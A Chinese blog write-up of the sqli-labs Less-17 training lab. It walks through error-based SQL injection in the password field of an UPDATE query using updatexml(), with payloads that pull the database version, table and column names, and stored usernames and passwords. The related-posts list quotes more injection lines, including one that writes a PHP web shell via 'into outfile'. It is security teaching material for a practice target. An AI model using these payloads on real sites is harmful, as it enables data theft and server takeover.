sqli-labs Less-17

最新推荐文章于 2024-08-15 22:17:20 发布
最新推荐文章于 2024-08-15 22:17:20 发布
阅读量190 收藏
点赞数
分类专栏: sqli-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42630215/article/details/105417828
版权

Less-17 POST -Update Query -Error Based -String

0x01.查看代码

与往常一样随便输入几组测试一下
uname=1’&passwd=1
uname=1”&passwd=1
uname=1&passwd=1’
uname=1&passwd=1”
都返回错误页面

根据这关提示,Mysql语句应该涉及到update,查看一下源码

在这里插入图片描述

在这里插入图片描述
接收到用户提交的username和password后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg。

输入正确的用户名看看:username:admin Password:1‘

在这里插入图片描述

有报错信息,存在注入点

0x02.涉及的几个PHP函数

substr()函数
在这里插入图片描述
get_magic_quotes_gpc()函数

get_magic_quotes_gpc()函数取得PHP环境配置的变量magic_quotes_gpc(GPC, Get/Post/Cookie)值。返回0表示本功能关闭,返回1表示本功能打开。
当magic_quotes_gpc打开时,所有的’(单引号)、"(双引号)、(反斜杠)和NULL(空字符)会自动转为含有反斜杠的溢出字符。

addslashes()函数在这里插入图片描述
stripslashes()函数
在这里插入图片描述
ctype_digit()函数

ctype_digit(string)函数检查字符串中每个字符是否都是十进制数字,若是则返回TRUE,否则返回FALSE。

mysql_real_escape_string()函数
在这里插入图片描述

intval()函数在这里插入图片描述
成功时返回var的integer值,失败时返回0。空的array返回0,非空的array返回1,最大的值取决于操作系统。

0x03.分析代码

在这里插入图片描述
1.如果uname非空,截取它的前15个字符。
2. 如果php环境变量magic_quotes_gpc打开,删除由 addslashes() 函数添加的反斜杠。
3. ctype_digit()判断是不是数字,是数字就返回true,否则返回false,mysql_real_escape_string()转义 SQL 语句中使用的字符串中的特殊字符。

对于uname的过滤非常严谨,所以我们只能在passwd这里注入

0x04.构造payload

updatexml()函数

UpdateXML(xml_target, xpath_expr, new_xml)

在这里插入图片描述
第一个参数是目标是针对于xml文档
第二参数是xpath的表达,这里可以看下xpath教程: http://www.w3school.com.cn/xpath/
第三个参数是将xpath表达式转换成什么,也就是替换查找到的符合条件的数据updatexml()函数是MySQL对xml文档数据进行查询和修改的xpath函数。简单来说就是,用new_xml把xml_target中包含xpath_expr的部分节点(包括xml_target)替换掉。
在这里插入图片描述
在这里插入图片描述

其中’//b’的斜杠表示不管b节点在哪一层都替换掉,而’/b’则是指在根目录下替换,此处xml_target的根目录节点是a。

0x05.注入获取数据

获取版本号
uname=admin&passwd=1’and(updatexml(1,concat(0x5c,version(),0x5c),1))#&submit=Submit

在这里插入图片描述
获取数据库名
uname=admin&passwd=1’ or updatexml(1,concat(’#’,(database())),0)#&submit=Submit

在这里插入图片描述
获取表名
uname=admin&passwd=1’ or updatexml(1,concat(’#’,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’)),0)#&submit=Submit
在这里插入图片描述
获取字段名
uname=admin&passwd=1’ or updatexml(1,concat(’#’,(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’)),0)#&submit=Submit
在这里插入图片描述
获取字段值
uname=admin&passwd=’ or updatexml(1,concat(’#’,(select concat(id,’#’,username,’#’,password) from users limit 0,1)),0)

在这里插入图片描述

通过修改limit值来获得其他字段

(看了一些大佬写的相关文章,根据自己的思路整理了一下,侵删)

S1xTwe1ve
关注
专栏目录
sqli-labs-less17
qq_45106794的博客
10-23 868
#sqli-labs-less17 在对uname这一项进行注入,发现不管是’ " ’ ) " )等,都显示一样,说明无法进行注入,也说明源代码可能有对uname进行检查,再试试passwd这一项 成功报错,说明passwd这一项可以进行注入 'or (select 1 from (select count(),concat(floor(rand(0)2),database())as x f...
floor报错注入的两种格式
aitong的博客
01-31 481
联合查询 http://127.0.0.1/sqli-labs/less-6/?id=1" union select null,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from users group by x--+ 其中1是因为联合查询列数要相同所以补个1,换成null也可以 users可
sqli-labs(less-17)
欢迎光临
06-09 3905
首先要介绍UpdateXML('xml_target','xpath_expr','new_xml')举个例子就知道了可以看到,uname用check_input()函数进行了处理看看是如何处理的只截取15个字符get_magic_quotes_gpc()当magic_quotes_gpc=On的时候,函数get_magic_quotes_gpc()就会返回1当magic_quotes_gpc=O...
sqli-labs-master第17
m_ing
05-14 2787
前言:这一关变化还是挺大的,让我们修改密码。 第17关 http://192.168.89.134/sqli-labs-master/Less-17/ 到这里我们还是毫无头绪,只能看源代码 从源码中可以看到:接收到用户POST的uname和passwd后,首先根据uname查询数据库的username和password,若uname存在则用passwd替换password,若不存在则显示slap1.jpg 在用户名正确后,页面便能够返回Mysql错误信息 所以我们决定用报错注入 使用updatexml(
Sqli-labs less-17
最新发布
weixin_46099552的博客
08-15 335
会报错,所以应该使用报错注入(图放错了)在burp抓包后放进重放器然后直接粘贴就行。语句就知道应该是在密码上注入,输入。看对话框是新建用户,是。可以使用子查询来绕过。
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 15万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
SQLI-LABS Less-17
Web学习之路
03-24 121
Update注入
Sqli-labs Less7
beiweixiaotian66的博客
07-23 439
一丢丢小练习
Sqli-labs less-01
weixin_47075747的博客
12-12 581
Sqli-labs less-01 mysql 基本用法 查库:select schema_name from information_schema.schemata; 查表:select table_name from information_schema.tables where table_schema='security';
Sqli-labs Less8
orchid_sea的博客
10-16 1080
1.判断注入点 2.判断字段数 3.爆破数据库 4.爆破表 5.爆破列 6.爆破数据
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1442
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
sqli-labs Less-8
qq_42630215的博客
03-13 1398
Less-8 Get - Blind -Boolian Based -Single Quotes 1.原页面 2.?id=1 3.?id=1’ 4.尝试布尔盲注 代码存在sql注入漏洞,然而页面既不会回显数据,也不会回显错误信息,我们可以通过构造语句,来判断数据库信息的正确性,再通过页面的“真”和“假”来识别我们判断的是否正确 ?id=1’ and (length(database()))&gt...
sqli-labs Less-18
qq_42630215的博客
05-04 810
LESS-18 POST - Header Injection -Uagent field - Error based 0x01. 随便测试几个查看有无回显 错误回显和正确回显都是显示IP地址 错误回显: 正确回显: 在正确的回显中可以看见user agent,猜测可以利用进行注入,可以查看源码进行分析。 用户名与密码的获取方式是post,而且采用了check_input处理,所以在这两个地...
sqli-labs Less-11
qq_42630215的博客
03-26 456
Less-11 POST - Error Based - Single quotes - String 0x01.原页面 检查元素可以看到用户名和密码两个参数分别为uname和passwd 输入正确的用户名和密码 有正确的回显 输入错误的用户名和密码 0x02.判断注入类型 uname=1 passwd=1 uname=1" passwd=1 uname=1’ passwd=1 Yo...
sqli-labs Less-14
qq_42630215的博客
03-28 335
Less-14 POST -Double Injection -Single quotes - String -with twist 与Less-13只有闭合方式不同,都是通过双注入来破解。基本步骤一致。 0x01. uname=1&passwd=1&submit=Submit uname=1"&passwd=1&submit=Submit You have ...
sqli-labs Less-12
qq_42630215的博客
03-26 248
Less-12 POST -Error Based - Double quotes - String - with twist Less-11 与 Less-12差别在于一个是单引号一个是双引号加括号,对于Less-12就直接用burp suite来做练习,步骤与Less-11基本一致。 0x01.原页面 用户名和密码两个参数分别为uname和passwd。Burp中提交参数uname=xxx&...
sqli-labs-less1
05-26
sqli-labs-less1是一个SQL注入练习平台,它主要用于学习和测试SQL注入攻击技术。sqli-labs-less1是一个非常基础的例子,旨在演示如何使用SQL注入攻击来绕过登录认证。它提供了一个登录页面,其中包含用户名和密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值